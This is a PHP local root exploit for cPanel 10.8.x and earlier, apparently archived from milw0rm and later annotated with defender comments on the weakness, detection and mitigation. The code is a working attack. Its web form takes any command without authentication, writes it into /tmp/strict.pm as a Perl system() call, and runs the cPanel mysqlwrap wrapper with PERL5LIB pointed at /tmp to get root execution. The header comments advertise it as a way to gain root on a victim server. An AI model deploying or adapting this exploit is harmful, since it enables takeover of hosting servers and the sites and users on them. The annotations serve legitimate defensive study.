1 <!− To use the old cPanel exploit ( http://www.milw0rm.com/exploits/2466 ) you need to have
2 <!− bash shell access on the victim server, but with this new exploit you only need
3 <!− to upload a PHP file and run it in a browser on the victim server.
4 <!− then you have root Access and you can case anything ....
5 <!− Coded by nima salehi ( nima@ashiyane.ir )
6 <!− Ashiyane Security Corporation www.Ashiyane.ir >
7 <title>cPanel <= 10.8.x cpwrap root exploit (PHP)</title>
8 <center><img border="2" src="http://www.ashiyane.ir/images/logo.jpg" width="429" height="97"><br><br>
9 <?
10
// Pre-flight check 1 of 2: stop if the PHP safe_mode setting is enabled.
// ini_get("safe_mode") is tested for truthiness and, separately, for the
// literal string "on"; the second test looks redundant, because a non-empty
// "on" is already truthy. The @ operator hides any warning from ini_get().
// Defender note: safe_mode was removed in PHP 5.4, so on current PHP this
// gate never fires and offers no protection. Patching the wrapper and
// restricting process execution are the controls that matter.
11 if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
12 {
// Report the reason, print the author's banner, and end the request.
13 echo "<br><br><br><br><br><b>Sorry Safe−mode Is On ( Script Not Work On This Server ) </b><br><br><br><br><br>";
14 echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
15 exit();
16 }
17
// Pre-flight check 2 of 2: stop if passthru() is listed in disable_functions.
// The ini value is a comma-separated list; spaces are stripped before the
// split so that "a, b" and "a,b" yield the same entries.
// Defender note: this shows which setting blocks the script as written.
// A disable_functions list should cover every process-spawning function,
// not only passthru, and is defence in depth rather than a fix for the
// vulnerable wrapper itself.
18 $disablef = @ini_get("disable_functions");
19 if (!empty($disablef))
20 {
21 $disablef = str_replace(" ","",$disablef);
22 $disablef = explode(",",$disablef);
23 if (in_array("passthru",$disablef))
24 {
// Same exit path as the safe_mode gate: message, banner, end of request.
25 echo "<br><br><br><br><br><b>Sorry Passthru Is Disable ( Script Not Work On This Server ) </b><br><br><br><br><br>";
26 echo "<br><br><br>Powered By Ashiyane Security Corporation <a href=\"http://www.ashiyane.ir\"> www.Ashiyane.ir";
27 exit();
28 }
29 }
30
31 ?>
32
33 <form method="POST" action="<?php echo $surl; ?>">
34 Command : <input type="text" name="c" size="40">
35 <input type="submit" value=" Run " name="B1"></form>
36 <textarea cols="60" rows="20" readonly>
37 <?php
// Request handler: takes the "c" form field and passes it through the cPanel
// wrapper named on the last line of this block.
// Weakness class: untrusted search path (CWE-426 / CWE-427). A file named
// strict.pm is written to /tmp, a conventionally world-writable directory,
// and the wrapper is then started with PERL5LIB pointing at /tmp.
// Presumably the wrapper's privileged Perl code loads the "strict" pragma
// and resolves it through the caller's PERL5LIB. The wrapper's source is not
// on this page, so confirm against the vendor advisory for cPanel <= 10.8.x.
// Detection: strict.pm (or any file named like a core Perl module) in /tmp or
// another world-writable directory; the web server account starting binaries
// under /usr/local/cpanel/bin/ with PERL5LIB set; PHP files in a web root
// that hand request fields to passthru().
// Mitigation: update cPanel past the affected versions. A privileged wrapper
// should clear PERL5LIB, PERLLIB and PERL5OPT before starting the interpreter,
// or run Perl in taint mode, which ignores PERL5LIB and PERLLIB.
// No authentication or validation: whoever can reach this file over HTTP
// supplies the value.
38 $cmd=$_POST[’c’];
39 if ( $cmd != "" )
40 {
// The request value is concatenated, unescaped, into a Perl system() call
// and saved under the name of a core pragma.
41 $f=fopen("/tmp/strict.pm", "w");
42 fputs($f,’system("’.$cmd.’");’);
43 fclose($f);
// Starts the wrapper with the module search path overridden; its output is
// streamed into the surrounding <textarea>. The argument "nima" is a fixed
// string whose meaning to the wrapper is not shown here.
44 passthru("PERL5LIB=/tmp /usr/local/cpanel/bin/mysqlwrap nima");
45 }
46 ?>
47 </textarea>
48 <br>
49 Powered By Ashiyane Security Corporation <a href="http://www.ashiyane.ir"> www.Ashiyane.ir
50 </center>
51
52 # milw0rm.com [2006−10−13]
cPanel 10.8.x cpwrap via mysqladmin Local Root Exploit ph